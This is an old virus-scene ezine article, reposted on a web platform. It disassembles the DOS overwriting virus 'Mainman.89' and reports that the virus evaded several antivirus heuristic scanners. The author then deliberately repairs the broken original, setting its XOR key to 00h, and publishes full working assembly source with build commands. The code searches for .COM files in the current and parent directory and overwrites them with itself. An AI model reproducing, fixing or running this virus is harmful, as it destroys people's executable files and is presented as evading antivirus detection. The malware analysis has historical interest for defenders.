Copy Link
Add to Bookmark
Report

SLAM2.019: Mainman.89 Disassembly & Bug-Fix by Gothmog/[DHA]

eZine's profile picture
Published in 
Slam
 · 2 years ago

Mainman.89 or Trivial.89.B Disassembly, Comments, and Bug-Fix by Gothmog

Overview: The file KEYGEN.COM was posted to the usenet group alt.comp.virus source.code on April Fool's Day, 1997. The file was 31,568 bytes large, dated 04-02-97 at 7:14 P.M. Contained within the file was a trivial-esque overwriting virus that was, however, non-working.

Here is the full message from whoever posted the file, possibly the virus's author or also possibly just an interested collector or programmer:

; From mainman@wereverthefuckiwannabe.net Tue Apr 01 19:18:27 1997 
; Path: news.alt.net!news1.alt.net!worldnet.att.net!cpk-news-hub1.bbnplanet.com!news.bbnplanet.com!news.maxwell.syr.edu!news.accessus.net!not-for-mail
; From: mainman@wereverthefuckiwannabe.net (nada chance)
; Newsgroups: alt.comp.virus.source.code
; Subject: keygen.com (0/1)
; Date: Wed, 02 Apr 1997 00:18:27 GMT
; Organization: accessU.S., Inc
; Lines: 2
; Message-ID: <3341a588.158374802@news.accessus.net>
; NNTP-Posting-Host: mtv-pm2-2-100.accessus.net
; X-Newsreader: Forte Free Agent 1.1/32.230
; --------


it's just a dummy to show how easy it is to get past huero's if u already know that don't bother d/ling it cuz it's trash

According to the poster of this message above, the file is trash, but shows how to get past heuristic scanners. I decided to take a look, and fired up my antivirus scanners. Lo-and-behold, the virus was undetectable by AVPLite v3.0 build 107 Update 03/22/97, Dr. Solomon's FindVirus v7.70's heuristics, and F-Protect v2.26 w/ paranoid mode heuristics enabled, but raised several important flags with ThunderByte's TBSCAN v7.07:

  • C:\DOWNLOAD\KEYGEN.COM probably infected by an unknown virus
  • c No checksum / recovery information (Anti-Vir.Dat) available.
  • F Suspicious file access. Might be able to infect a file.
  • S Contains a routine to search for executable (.COM or .EXE) files.
  • # Found a code decryption routine or debugger trap. This is common for viruses but also for some copy-protected software.

My interest piqued, I decided to take a closer look. I quickly disassembled the host file, and took a look. Instead of finding some complex, huge code, I found that actual virus was a meager 89d bytes long. I added comments to the code, and found that as provided, the virus was non-functioning. While it seemed decent on the whole, for what it accomplished, it had one glaring error: the decryption routine at the beginning of the virus `xor'd' working code within the virus with 33h, making it crash as the encrypted junk code got executed. My only two explanations for this is that One) The programmer of this virus is on crack. (the most likely explanation :) and Two) Whoever wrote this virus depended on some funky use of the large prefetch queue on some 386's and all 486's. Prefetch queue `tricks', however, do not function on today's modern processors (Pentium's, Pentium-Pro's, etc.) and as such, should not be used in viruses, as they cause unpredictable results and fuck up in general. In any case, however, I don't see how the virus could spread effectively at all, as if either of these conditions are true, successive generations of the virus will not function: the encryption loop only occurs once in the virus, so written copies will have the bytes already xor'd.

Well, as bored as I am, I decided to make a _working_ copy of the virus, so I set off to work. The quickest and easiest way, I decided, was simply to change the encryption key from 33h to 00h. This fixes both bugs, and keeps the virus invisible to AVP, DSAV, and F-PROT. So without further ado, here it is (after the fine print, of course):

 Assemble with: tasm /m1 mainman.asm 
tlink /t mainman.obj (links to a 89d byte COM file)


This program has the potential to permanently destroy executable images on any disk medium. Other modifications may have been made subsequent to the original release by the author, either benign, or ones that could result in further harm should the program be executed. In any case, no responsibility whatsoever will be taken for any damages incidental or otherwise resulting from the use, or misuse, of this program by the author(s). Neither will any responsibility be taken for omissions or errors in the code, comments, etc.

==========================================================[ code begins ]== 

.model tiny
.code

org 100h

start_virus:
mov dx, [bp + offset encrypt_key] ; dx holds encryption key
lea bx, [bp + search_directory] ; address to start decrypting
mov cx, 22h ; number of bytes to decrypt

xor_loop:
xor [bx], dx ; decrypt byte at bx with key
add bx, 0002h ; process next word
loop xor_loop ; loop to encryption loop

mov cx, 0002h ; process two directories

search_directory:
push cx ; push cx = 0002h onto stack
mov ah, 4Eh ; ah = 4Eh, find first file
jmp skip_virus_signature ; jump over virus signature

db 0E9h ; byte fixup for tasm v4.0

dw offset skip_virus_signature - $ - 0002h

virus_signature db 'mainman'

skip_virus_signature:
mov cx, 0000h ; find all normal files
mov dx, offset file_mask ; ds:[dx] points to '*.com'
int 21h ; do it!

jc go_back_one_dir ; if no files found, go to
; parent directory

mov ax, 3D02h ; open file, read/write mode
mov dx, 9Eh ; filename in default dta
int 21h ; go! handle returned in ax

xchg bx, ax ; one byte; move handle to bx

mov ah, 40h ; ah = 40h, write file

mov cx, offset end_virus - offset start_virus

; ^----------------- number of bytes to write = end - start

mov dx, offset start_virus ; start at memory offset 100h
int 21h ; write the fat bitch...

mov ah, 3Eh ; ah = 3Eh, close file
int 21h ; fuckin' do it, man!

go_back_one_dir:
mov dx, offset dot_dot ; ds:[dx] points to '..'
mov ah, 3Bh ; ah = 3Bh, set current dir
int 21h ; change directory to parent

pop cx ; pop cx = 0002h off stack
loop search_directory ; loop till cx = 0000h (until
; two directories have been
; searched.)

int 20h ; terminate program, bye...

encrypt_key db 00h ; used for decrypting data

; ^----------------- value supplied in original program
; was 33h, this does not work, as it
; corrupts existing code.... (if you
; want an exact copy of the original
; sample, change this value to 33h.)

file_mask db '*.com', 00h ; used to find com files

dot_dot db '..', 00h ; '..' = parent directory

end_virus equ $

end start_virus

; ============================================================[ code ends ]==

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT